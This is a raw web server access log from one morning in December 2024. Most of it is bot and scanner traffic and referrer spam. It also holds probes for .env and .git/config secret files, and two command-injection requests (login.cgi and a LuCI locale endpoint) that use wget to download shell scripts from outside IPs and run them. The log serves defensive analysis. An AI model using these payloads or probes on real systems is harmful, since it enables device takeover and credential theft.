184.105.247.254 - - [03/Dec/2024:06:14:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0"
77.105.166.134 - - [03/Dec/2024:06:14:59 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44"
77.105.166.134 - - [03/Dec/2024:06:14:59 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44"
77.105.166.134 - - [03/Dec/2024:06:15:01 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5042.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:15:01 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5042.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:15:03 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:15:03 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:15:23 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:15:23 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:15:25 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:15:25 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:15:27 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:15:27 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
194.50.16.198 - - [03/Dec/2024:06:15:27 +0100] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "-"
64.62.197.18 - - [03/Dec/2024:06:16:10 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Iron Safari/537.36"
64.62.197.27 - - [03/Dec/2024:06:16:45 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.156 Not(A:Brand/24 YaBrowser/24.4.1.899 Yowser/2.5 Safari/537.36"
65.49.1.11 - - [03/Dec/2024:06:16:46 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) Gecko/20060609 Firefox/123.0esr"
65.49.1.22 - - [03/Dec/2024:06:17:21 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
184.105.247.254 - - [03/Dec/2024:06:17:33 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
141.98.11.48 - - [03/Dec/2024:06:17:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.50.16.198 - - [03/Dec/2024:06:17:43 +0100] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "-"
184.105.247.254 - - [03/Dec/2024:06:18:14 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0"
179.43.133.122 - - [03/Dec/2024:06:20:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
77.105.166.134 - - [03/Dec/2024:06:20:59 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:20:59 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:21:01 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:21:01 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:21:03 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:21:03 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:21:25 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:21:25 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:21:27 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:21:27 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:21:30 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:21:30 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
167.94.145.108 - - [03/Dec/2024:06:21:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.108 - - [03/Dec/2024:06:21:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.108 - - [03/Dec/2024:06:21:43 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.108 - - [03/Dec/2024:06:21:43 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
179.43.133.122 - - [03/Dec/2024:06:22:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
18.170.99.225 - - [03/Dec/2024:06:24:48 +0100] "\xf9\x97\x90U\xc1\x98\xf5\x81`\x18\x04\xb0\x84\xf9" 501 329 "-" "-"
194.50.16.198 - - [03/Dec/2024:06:25:12 +0100] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "-"
3.122.253.115 - - [03/Dec/2024:06:25:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
77.105.166.134 - - [03/Dec/2024:06:27:05 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:27:05 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:27:07 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:27:07 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:27:09 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:27:09 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:27:29 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:27:29 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:27:32 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:27:32 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:27:34 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:27:34 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
179.43.163.250 - - [03/Dec/2024:06:28:15 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.163.250 - - [03/Dec/2024:06:28:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [03/Dec/2024:06:28:15 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [03/Dec/2024:06:28:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [03/Dec/2024:06:28:16 +0100] "GET /.env.save HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:17 +0100] "GET /settings/.env HTTP/1.1" 404 318 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:17 +0100] "GET /.env.testing.local HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:18 +0100] "GET /.env.backup HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:18 +0100] "GET /.env.staging.local HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:18 +0100] "GET /core/.git/config HTTP/1.1" 404 321 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:18 +0100] "GET /.env.development.local HTTP/1.1" 404 327 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:19 +0100] "GET /.env.dev HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:19 +0100] "GET /.env_sample HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:19 +0100] "GET /server/.git/config HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:19 +0100] "GET /.envrc HTTP/1.1" 404 311 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:19 +0100] "GET /.gitlab-ci.yml HTTP/1.1" 404 319 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:19 +0100] "GET /files/.git/config HTTP/1.1" 404 322 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:20 +0100] "GET /.env.aws HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:20 +0100] "GET /.env.docker HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:20 +0100] "GET /config/.env HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:20 +0100] "GET /public/.git/config HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:21 +0100] "GET /dev/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:06:28:22 +0100] "GET /.env.dev.local HTTP/1.1" 404 319 "-" "l9explore/1.2.2"
179.43.133.122 - - [03/Dec/2024:06:30:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
76.11.185.195 - - [03/Dec/2024:06:32:47 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
205.210.31.129 - - [03/Dec/2024:06:32:50 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.129 - - [03/Dec/2024:06:32:50 +0100] "\x16\x03\x01" 501 318 "-" "-"
77.105.166.134 - - [03/Dec/2024:06:33:18 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:33:18 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:33:20 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:33:20 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:33:22 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44"
77.105.166.134 - - [03/Dec/2024:06:33:23 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44"
77.105.166.134 - - [03/Dec/2024:06:33:45 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:33:45 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:33:47 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:33:48 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:33:50 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:33:50 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
194.50.16.198 - - [03/Dec/2024:06:34:00 +0100] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "-"
31.220.1.88 - - [03/Dec/2024:06:34:59 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
77.105.166.134 - - [03/Dec/2024:06:39:31 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:39:31 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:39:33 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:39:33 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:39:35 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44"
77.105.166.134 - - [03/Dec/2024:06:39:35 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44"
77.105.166.134 - - [03/Dec/2024:06:39:55 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44"
77.105.166.134 - - [03/Dec/2024:06:39:55 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44"
77.105.166.134 - - [03/Dec/2024:06:39:57 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:39:57 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:39:59 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:39:59 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
122.117.95.52 - - [03/Dec/2024:06:41:07 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
51.158.205.47 - - [03/Dec/2024:06:42:04 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
77.105.166.134 - - [03/Dec/2024:06:45:33 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:45:33 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:45:35 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:45:35 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:45:37 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:45:38 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:45:57 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:45:58 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:46:00 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:46:00 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:46:02 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:06:46:02 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
168.76.20.229 - - [03/Dec/2024:06:46:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36"
168.76.20.229 - - [03/Dec/2024:06:46:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
168.76.20.229 - - [03/Dec/2024:06:46:05 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
168.76.20.229 - - [03/Dec/2024:06:46:06 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
123.241.17.235 - - [03/Dec/2024:06:51:18 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
